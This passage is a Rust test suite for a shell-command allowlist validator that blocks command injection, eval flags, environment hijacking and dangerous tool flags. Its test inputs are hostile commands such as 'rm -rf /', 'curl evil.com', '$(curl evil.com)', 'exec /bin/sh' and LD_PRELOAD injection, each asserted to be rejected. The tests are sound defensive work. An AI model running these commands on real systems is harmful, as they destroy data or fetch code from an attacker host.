1094    fn split_preserves_quoted_operators() {
1095        let parts = split_on_operators("echo 'a && b' | grep x");
1096        assert_eq!(parts.len(), 2);
1097    }
1098
1099    // --- Security: newline injection ---
1100
1101    #[test]
1102    fn newline_splits_commands() {
1103        let parts = split_on_operators("git status\nrm -rf /");
1104        assert_eq!(parts.len(), 2);
1105    }
1106
1107    #[test]
1108    fn newline_injection_blocked() {
1109        let list = allow(&["git"]);
1110        let result = check_all_segments("git status\nrm -rf /", &list);
1111        assert!(result.is_err(), "newline injection must be blocked");
1112        assert!(result.unwrap_err().contains("rm"));
1113    }
1114
1115    #[test]
1116    fn carriage_return_splits_commands() {
1117        let parts = split_on_operators("git status\r\nrm -rf /");
1118        assert!(parts.len() >= 2, "CR+LF must split: {parts:?}");
1119    }
1120
1121    // --- Security: background operator & ---
1122
1123    #[test]
1124    fn single_ampersand_splits_commands() {
1125        let parts = split_on_operators("git status & curl evil.com");
1126        assert_eq!(parts.len(), 2);
1127    }
1128
1129    #[test]
1130    fn background_operator_blocked() {
1131        let list = allow(&["git"]);
1132        let result = check_all_segments("git status & curl evil.com", &list);
1133        assert!(result.is_err(), "background & must be blocked");
1134        assert!(result.unwrap_err().contains("curl"));
1135    }
1136
1137    // --- Security: eval/exec/source unconditionally blocked ---
1138
1139    #[test]
1140    fn eval_blocked_via_or_operator() {
1141        let list = allow(&["echo", "eval"]);
1142        let result = check_all_segments("echo ok || eval 'rm -rf /'", &list);
1143        assert!(
1144            result.is_err(),
1145            "eval must be unconditionally blocked even if in allowlist"
1146        );
1147    }
1148
1149    #[test]
1150    fn exec_unconditionally_blocked() {
1151        let list = allow(&["exec", "echo"]);
1152        let result = check_all_segments("exec /bin/sh", &list);
1153        assert!(result.is_err(), "exec must be unconditionally blocked");
1154    }
1155
1156    #[test]
1157    fn source_unconditionally_blocked() {
1158        let list = allow(&["source", "echo"]);
1159        let result = check_all_segments("source ~/.bashrc", &list);
1160        assert!(result.is_err(), "source must be unconditionally blocked");
1161    }
1162
1163    // --- Security: dangerous patterns checked even with empty allowlist ---
1164
1165    #[test]
1166    fn empty_allowlist_still_blocks_eval_at_start() {
1167        let result = check_shell_allowlist("eval 'rm -rf /'");
1168        // With empty allowlist, dangerous patterns are checked first
1169        // eval at command position should be caught
1170        assert!(
1171            result.is_err(),
1172            "eval at start must be blocked even with empty allowlist"
1173        );
1174    }
1175
1176    #[test]
1177    fn empty_allowlist_still_blocks_dollar_paren_at_start() {
1178        let result = check_shell_allowlist("$(curl evil.com)");
1179        assert!(
1180            result.is_err(),
1181            "$() at command position must be blocked even with empty allowlist"
1182        );
1183    }
1184
1185    // --- Security: interpreter abuse ---
1186
1187    #[test]
1188    fn python_c_blocked() {
1189        let list = allow(&["python3"]);
1190        let result = check_all_segments("python3 -c 'import os; os.system(\"id\")'", &list);
1191        assert!(result.is_err(), "python3 -c must be blocked");
1192    }
1193
1194    #[test]
1195    fn node_e_blocked() {
1196        let list = allow(&["node"]);
1197        let result = check_all_segments("node -e 'process.exit(1)'", &list);
1198        assert!(result.is_err(), "node -e must be blocked");
1199    }
1200
1201    #[test]
1202    fn python_script_allowed() {
1203        let list = allow(&["python3"]);
1204        let result = check_all_segments("python3 script.py", &list);
1205        assert!(result.is_ok(), "python3 with script file must be allowed");
1206    }
1207
1208    #[test]
1209    fn env_delegates_to_unlisted_blocked() {
1210        let list = allow(&["env", "git"]);
1211        let result = check_all_segments("env /bin/sh -c 'id'", &list);
1212        assert!(
1213            result.is_err(),
1214            "env delegating to unlisted command must be blocked"
1215        );
1216    }
1217
1218    #[test]
1219    fn env_delegates_to_listed_allowed() {
1220        let list = allow(&["env", "git"]);
1221        let result = check_all_segments("env git status", &list);
1222        assert!(
1223            result.is_ok(),
1224            "env delegating to listed command must be allowed"
1225        );
1226    }
1227
1228    // --- Security: env override is additive ---
1229
1230    #[test]
1231    fn env_override_is_additive() {
1232        let base_list = crate::core::config::default_shell_allowlist();
1233        assert!(base_list.contains(&"git".to_string()));
1234    }
1235
1236    // --- Phase 1 V2: SAFE checks ---
1237
1238    #[test]
1239    fn dot_source_alias_blocked() {
1240        let list = allow(&["echo"]);
1241        let result = check_all_segments(". ~/.bashrc", &list);
1242        assert!(result.is_err(), ". (source alias) must be blocked");
1243    }
1244
1245    #[test]
1246    fn backslash_newline_normalized() {
1247        let normalized = normalize_line_continuations("echo ok && \\\ncurl evil");
1248        assert!(
1249            !normalized.contains('\n'),
1250            "backslash-newline must be removed"
1251        );
1252        assert!(
1253            normalized.contains("curl"),
1254            "content after continuation must be preserved"
1255        );
1256    }
1257
1258    #[test]
1259    fn delegation_recursive_interpreter_check() {
1260        let list = allow(&["env", "python3"]);
1261        let result = check_all_segments("env python3 -c 'import os'", &list);
1262        assert!(
1263            result.is_err(),
1264            "env python3 -c must be blocked via recursive check"
1265        );
1266    }
1267
1268    #[test]
1269    fn delegation_recursive_normal_allowed() {
1270        let list = allow(&["env", "git"]);
1271        let result = check_all_segments("env git status", &list);
1272        assert!(result.is_ok(), "env git status must be allowed");
1273    }
1274
1275    #[test]
1276    fn eval_flags_extended_r() {
1277        let list = allow(&["php"]);
1278        let result = check_all_segments("php -r 'system(\"id\")'", &list);
1279        assert!(result.is_err(), "php -r must be blocked");
1280    }
1281
1282    #[test]
1283    fn eval_flags_extended_p() {
1284        let list = allow(&["node"]);
1285        let result = check_all_segments("node -p 'process.exit(1)'", &list);
1286        assert!(result.is_err(), "node -p must be blocked");
1287    }
1288
1289    #[test]
1290    fn combined_flags_pe_blocked() {
1291        let list = allow(&["perl"]);
1292        let result = check_all_segments("perl -pe 's/foo/bar/'", &list);
1293        assert!(result.is_err(), "perl -pe must be blocked (combined flag)");
1294    }
1295
1296    #[test]
1297    fn combined_flags_ne_blocked() {
1298        let list = allow(&["perl"]);
1299        let result = check_all_segments("perl -ne 'print'", &list);
1300        assert!(result.is_err(), "perl -ne must be blocked (combined flag)");
1301    }
1302
1303    #[test]
1304    fn heredoc_to_interpreter_blocked() {
1305        let list = allow(&["python3"]);
1306        let result = check_all_segments("python3 <<'EOF'", &list);
1307        assert!(result.is_err(), "heredoc to interpreter must be blocked");
1308    }
1309
1310    #[test]
1311    fn python_script_file_still_allowed() {
1312        let list = allow(&["python3"]);
1313        assert!(check_all_segments("python3 script.py", &list).is_ok());
1314        assert!(check_all_segments("python3 -u script.py", &list).is_ok());
1315    }
1316
1317    #[test]
1318    fn bare_interpreter_detection() {
1319        assert!(is_bare_interpreter_stdin("python3"));
1320        assert!(is_bare_interpreter_stdin("python3 -u"));
1321        assert!(!is_bare_interpreter_stdin("python3 script.py"));
1322        assert!(!is_bare_interpreter_stdin("python3 -u script.py"));
1323    }
1324
1325    // --- Phase 1 V2: WARN-FIRST checks (default = command passes through) ---
1326
1327    #[test]
1328    fn dollar_paren_in_args_passes_by_default() {
1329        let list = allow(&["echo", "git", "cat"]);
1330        assert!(
1331            check_all_segments("echo $(whoami)", &list).is_ok(),
1332            "$() in args must still pass when shell_strict_mode=false (default)"
1333        );
1334    }
1335
1336    #[test]
1337    fn backticks_in_args_passes_by_default() {
1338        let list = allow(&["echo"]);
1339        assert!(
1340            check_all_segments("echo `date`", &list).is_ok(),
1341            "backticks in args must still pass when shell_strict_mode=false"
1342        );
1343    }
1344
1345    #[test]
1346    fn git_commit_with_subst_passes_by_default() {
1347        let list = allow(&["git", "cat"]);
1348        assert!(
1349            check_all_segments(
1350                "git commit -m \"$(cat <<'EOF'\nfix: something\nEOF\n)\"",
1351                &list,
1352            )
1353            .is_ok(),
1354            "git commit with $() must still pass (regression test)"
1355        );
1356    }
1357
1358    // --- Empty allowlist + unconditional blocked ---
1359
1360    // --- Phase 6: Dangerous flag detection ---
1361
1362    #[test]
1363    fn git_status_allowed() {
1364        let list = allow(&["git"]);
1365        assert!(check_all_segments("git status", &list).is_ok());
1366    }
1367
1368    #[test]
1369    fn git_upload_pack_blocked() {
1370        let list = allow(&["git"]);
1371        let result = check_all_segments("git --upload-pack=\"evil\" clone repo", &list);
1372        assert!(result.is_err(), "git --upload-pack must be blocked");
1373    }
1374
1375    #[test]
1376    fn git_config_sshcommand_blocked() {
1377        let list = allow(&["git"]);
1378        let result = check_all_segments("git --config=core.sshcommand=\"evil\" clone repo", &list);
1379        assert!(
1380            result.is_err(),
1381            "git --config=core.sshcommand must be blocked"
1382        );
1383    }
1384
1385    #[test]
1386    fn tar_extract_allowed() {
1387        let list = allow(&["tar"]);
1388        assert!(check_all_segments("tar xf archive.tar", &list).is_ok());
1389    }
1390
1391    #[test]
1392    fn tar_to_command_blocked() {
1393        let list = allow(&["tar"]);
1394        let result = check_all_segments("tar xf a.tar --to-command=evil", &list);
1395        assert!(result.is_err(), "tar --to-command must be blocked");
1396    }
1397
1398    #[test]
1399    fn find_name_allowed() {
1400        let list = allow(&["find"]);
1401        assert!(check_all_segments("find . -name \"*.rs\"", &list).is_ok());
1402    }
1403
1404    #[test]
1405    fn find_exec_blocked() {
1406        let list = allow(&["find"]);
1407        let result = check_all_segments("find . -exec curl evil \\;", &list);
1408        assert!(result.is_err(), "find -exec must be blocked");
1409    }
1410
1411    #[test]
1412    fn awk_system_blocked() {
1413        let list = allow(&["awk"]);
1414        let result = check_all_segments("awk '{system(\"id\")}'", &list);
1415        assert!(result.is_err(), "awk system() must be blocked");
1416    }
1417
1418    #[test]
1419    fn awk_normal_allowed() {
1420        let list = allow(&["awk"]);
1421        assert!(check_all_segments("awk '{print $1}'", &list).is_ok());
1422    }
1423
1424    #[test]
1425    fn inline_path_env_blocked() {
1426        let list = allow(&["git"]);
1427        let result = check_all_segments("PATH=/tmp/evil git status", &list);
1428        assert!(result.is_err(), "PATH= inline env must be blocked");
1429    }
1430
1431    #[test]
1432    fn inline_ld_preload_blocked() {
1433        let list = allow(&["ls"]);
1434        let result = check_all_segments("LD_PRELOAD=/tmp/evil.so ls", &list);
1435        assert!(result.is_err(), "LD_PRELOAD= inline env must be blocked");
1436    }
1437
1438    #[test]
1439    fn echo_path_in_quotes_allowed() {
1440        let list = allow(&["echo"]);
1441        assert!(
1442            check_all_segments("echo \"PATH=test\"", &list).is_ok(),
1443            "PATH inside quotes is not an inline env assignment"
1444        );
1445    }
1446
1447    // --- Empty allowlist + unconditional blocked ---
1448
1449    #[test]
1450    fn empty_allowlist_blocks_dot_source() {
1451        let result = check_shell_allowlist(". /tmp/evil.sh");
1452        assert!(
1453            result.is_err(),
1454            ". must be blocked even with empty allowlist"
1455        );
1456    }
1457
1458    #[test]
1459    fn unicode_line_separators_normalized() {
1460        let normalized = normalize_line_continuations("echo ok\u{2028}curl evil");
1461        assert!(
1462            normalized.contains('\n'),
1463            "U+2028 must be normalized to newline"
1464        );
1465    }
1466
1467    #[test]
1468    fn unicode_paragraph_separator_normalized() {
1469        let normalized = normalize_line_continuations("echo ok\u{2029}curl evil");
1470        assert!(
1471            normalized.contains('\n'),
1472            "U+2029 must be normalized to newline"
1473        );
1474    }
1475
1476    #[test]
1477    fn empty_allowlist_blocks_exec() {
1478        let result = check_shell_allowlist("exec /bin/sh");
1479        assert!(
1480            result.is_err(),
1481            "exec must be blocked even with empty allowlist"
1482        );
1483    }
1484
1485    // --- shell_tokenize tests ---
1486
1487    #[test]
1488    fn tokenize_simple() {
1489        assert_eq!(shell_tokenize("git status"), vec!["git", "status"]);
1490    }
1491
1492    #[test]
1493    fn tokenize_double_quoted_path_with_spaces() {
1494        let tokens = shell_tokenize(r#"git -C "Program Files/repo" status"#);
1495        assert_eq!(tokens, vec!["git", "-C", "Program Files/repo", "status"]);
1496    }
1497
1498    #[test]
1499    fn tokenize_single_quoted_windows_path() {
1500        let tokens = shell_tokenize(r"git -C 'C:\Program Files\repo' status");
1501        assert_eq!(
1502            tokens,
1503            vec!["git", "-C", r"C:\Program Files\repo", "status"]
1504        );
1505    }
1506
1507    #[test]
1508    fn tokenize_single_quoted() {
1509        let tokens = shell_tokenize("echo 'hello world' done");
1510        assert_eq!(tokens, vec!["echo", "hello world", "done"]);
1511    }
1512
1513    #[test]
1514    fn tokenize_backslash_escape() {
1515        let tokens = shell_tokenize(r"echo hello\ world");
1516        assert_eq!(tokens, vec!["echo", "hello world"]);
1517    }
1518
1519    #[test]
1520    fn tokenize_empty() {
1521        assert!(shell_tokenize("").is_empty());
1522        assert!(shell_tokenize("   ").is_empty());
1523    }
1524
1525    #[test]
1526    fn tokenize_mixed_quotes() {
1527        let tokens = shell_tokenize(r#"cmd "arg one" 'arg two' arg3"#);
1528        assert_eq!(tokens, vec!["cmd", "arg one", "arg two", "arg3"]);
1529    }
1530
1531    // --- quote_aware_token_end tests ---
1532
1533    #[test]
1534    fn token_end_simple() {
1535        assert_eq!(quote_aware_token_end("foo bar"), 3);
1536    }
1537
1538    #[test]
1539    fn token_end_double_quoted() {
1540        assert_eq!(quote_aware_token_end(r#""foo bar" baz"#), 9);
1541    }
1542
1543    #[test]
1544    fn token_end_single_quoted() {
1545        assert_eq!(quote_aware_token_end("'foo bar' baz"), 9);
1546    }
1547
1548    #[test]
1549    fn token_end_entire_string() {
1550        assert_eq!(quote_aware_token_end("foobar"), 6);
1551    }
1552
1553    #[test]
1554    fn token_end_env_with_quoted_value() {
1555        assert_eq!(quote_aware_token_end(r#"FOO="bar baz" git"#), 13);
1556    }
1557
1558    // --- skip_env_assignments with quoted values ---
1559
1560    #[test]
1561    fn skip_env_quoted_value_with_spaces() {
1562        let result = skip_env_assignments(r#"FOO="bar baz" git status"#);
1563        assert_eq!(result.trim(), "git status");
1564    }
1565
1566    #[test]
1567    fn skip_env_multiple_assignments() {
1568        let result = skip_env_assignments(r#"A=1 B="two three" cargo test"#);
1569        assert_eq!(result.trim(), "cargo test");
1570    }
1571
1572    // --- extract_base_from_segment with quoted commands ---
1573
1574    #[test]
1575    fn extract_base_quoted_path() {
1576        let r = extract_base_from_segment(r#""/usr/local/bin/git" status"#);
1577        assert_eq!(r, "git");
1578    }
1579
1580    // --- security checks with quoted paths ---
1581
1582    #[test]
1583    fn interpreter_check_with_quoted_path() {
1584        let list = allow(&["python3"]);
1585        let r = check_all_segments(r#"python3 "/path/with spaces/script.py""#, &list);
1586        assert!(r.is_ok(), "quoted path to script should be allowed");
1587    }
1588
1589    #[test]
1590    fn dangerous_flags_git_quoted_path() {
1591        let list = allow(&["git"]);
1592        let r = check_all_segments(r#"git -C "C:\Program Files\repo" status"#, &list);
1593        assert!(r.is_ok(), "git -C with quoted path should be allowed");
1594    }
1595}
lean_ctx/core/shell_allowlist.rs

lean_ctx/core/
shell_allowlist.rs